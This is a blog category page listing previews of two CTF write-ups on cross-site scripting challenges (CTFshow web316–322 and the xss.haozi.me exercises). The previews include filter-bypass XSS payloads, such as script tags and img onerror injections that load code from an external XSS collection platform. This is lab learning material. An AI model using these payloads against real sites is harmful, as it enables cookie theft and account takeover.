![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
XSS
文章平均质量分 90
D.MIND
安全领域的小学生
展开
-
CTFshow——XSS
文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格 web316 利用xss平台里的代码进行攻击: https://xss.pt/xss.php <sCRiPt sRC=//xss.pt/kUIB></sCrIpT> web317——过滤了script <img src=x onerror=s=createElement('script');body.appendChild(s);s.sr原创 2021-04-01 18:38:04 · 604 阅读 · 1 评论 -
XSS挑战赛
前言: 对于我这种XSS小白(不对,把"XSS"去掉)还是能学到不少基础知识的 Here We GO! 练习地址:https://xss.haozi.me/#/0x00 0x00 function render (input) { return '<div>' + input + '</div>' } 放在<div>中,直接就: <script>alert(/1/)</script> 0x01 function render (input原创 2021-03-14 00:12:25 · 689 阅读 · 2 评论